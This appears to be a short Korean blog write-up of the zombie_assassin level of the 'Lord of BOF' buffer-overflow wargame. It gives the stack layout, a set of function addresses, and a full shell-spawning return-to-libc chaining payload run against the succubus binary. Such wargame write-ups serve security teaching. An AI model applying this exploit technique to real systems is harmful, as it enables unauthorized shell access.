본문 바로가기

Wargames/Load Of BOF

LOB Redhat 6.2 - zombie_assassin


zomble_assassin - calling functions continuously

Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]

DO : 0x80487ec
GYE : 0x80487bc
GUL : 0x804878c
YUT : 0x804875c
MO : 0x8048724

"/bin/sh" : 0xbffffa98

Payload : ./succubus `python -c 'print "A"*44 + "\xec\x87\x04\x08" + "\xbc\x87\x04\x08" + "\x8c\x87\x04\x08" + "\x5c\x87\x04\x08" + "\x24\x87\x04\x08" + "AAAA" + "\x98\xfa\xff\xbf" + "/bin/sh"'`


Using RTL Chaining

'Wargames > Load Of BOF' 카테고리의 다른 글

LOB Redhat 6.2 - nightmare  (0) 2015.11.02
LOB Redhat 6.2 - succubus  (0) 2015.11.02
LOB Redhat 6.2 - assassin  (0) 2015.10.30
LOB Redhat 6.2 - giant  (0) 2015.10.30
LOB Redhat 6.2 - bugbear  (0) 2015.10.30